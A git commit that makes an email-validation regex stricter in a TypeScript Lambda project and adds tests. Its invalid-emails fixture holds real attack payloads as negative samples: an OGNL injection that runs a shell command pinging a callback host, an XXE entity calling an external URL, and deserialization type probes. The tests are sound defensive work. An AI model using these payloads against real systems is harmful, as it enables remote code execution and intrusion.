fix: make email regexp more strict

We basically do not want crap to enter the database
so this makes the RegExp for accepted emails more
strict.

HT to @ChrisAD for providing nice samples.

Author: coderbyheart

lambda/shareDevice.ts

@@ -10,14 +10,13 @@ import {
 import { Context, Model } from '@hello.nrfcloud.com/proto-map/api'
 import { fromEnv } from '@nordicsemiconductor/from-env'
 import { Type } from '@sinclair/typebox'
-import {
-	type APIGatewayProxyEventV2,
-	type APIGatewayProxyResultV2,
+import type {
+	APIGatewayProxyEventV2,
+	APIGatewayProxyResultV2,
 } from 'aws-lambda'
 import { randomUUID } from 'node:crypto'
 import { publicDevicesRepo } from '../devices/publicDevicesRepo.js'
 import { sendOwnershipVerificationEmail } from './sendOwnershipVerificationEmail.js'
-
 import { MetricUnit } from '@aws-lambda-powertools/metrics'
 import { logMetrics } from '@aws-lambda-powertools/metrics/middleware'
 import { SSMClient } from '@aws-sdk/client-ssm'
@@ -30,6 +29,7 @@ import { fingerprintRegExp } from '@hello.nrfcloud.com/proto/fingerprint'
 import middy from '@middy/core'
 import { getSettings } from '../hello/settings.js'
 import { helloApi } from '../hello/api.js'
+import { Email } from '../util/validation/email.js'
 
 const {
 	publicDevicesTableName,
@@ -81,11 +81,7 @@ const validateInput = validateWithTypeBox(
 			}),
 		]),
 		Type.Object({
-			email: Type.RegExp(/.+@.+/, {
-				title: 'Email',
-				description:
-					'The email of the owner of the device. They have to confirm the publication of the device every 30 days.',
-			}),
+			email: Email,
 		}),
 	]),
 )

util/validation/email.spec.ts

@@ -0,0 +1,29 @@
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import invalidEmails from './invalid-emails.json' assert { type: 'json' }
+import { validateWithTypeBox } from '@hello.nrfcloud.com/proto'
+import { Email } from './email.js'
+
+const v = validateWithTypeBox(Email)
+
+void describe('it should validate emails', () => {
+	for (const validEmail of ['alex@example.com', 'a@a.no']) {
+		void it(`should validate ${validEmail}`, () => {
+			assert.equal(
+				'errors' in v(validEmail),
+				false,
+				`${validEmail} should be valid`,
+			)
+		})
+	}
+
+	for (const email of invalidEmails) {
+		void it(`should not validate ${email}`, () => {
+			assert.equal(
+				'errors' in v(email),
+				true,
+				`The email ${email} should not be valid!`,
+			)
+		})
+	}
+})

util/validation/email.ts

@@ -0,0 +1,12 @@
+import { Type } from '@sinclair/typebox'
+
+const disallowedChars = '@;" '
+const rx = new RegExp(
+	`^[^${disallowedChars}]{1,256}@[^${disallowedChars}]{3,253}$`,
+	'i',
+)
+export const Email = Type.RegExp(rx, {
+	title: 'Email',
+	description:
+		'The email of the owner of the device. They have to confirm the publication of the device every 30 days.',
+})

util/validation/invalid-emails.json

@@ -0,0 +1,7 @@
+[
+  "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping j9tbwbatz7e2rvipj6r59wf4yv4lsa.example.com -c1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}",
+  "<!DOCTYPE foo [<!ENTITY xxeww2qq SYSTEM \"http://foo.example.com\"> ]>alex@example.com;alex@example.eu<root>&xxeww2qq;</root>",
+  "alex@example.com;alex@example.eu",
+  "{\"@type\":\"Freddy\"}",
+  "{\"@class\":\"\"}"
+]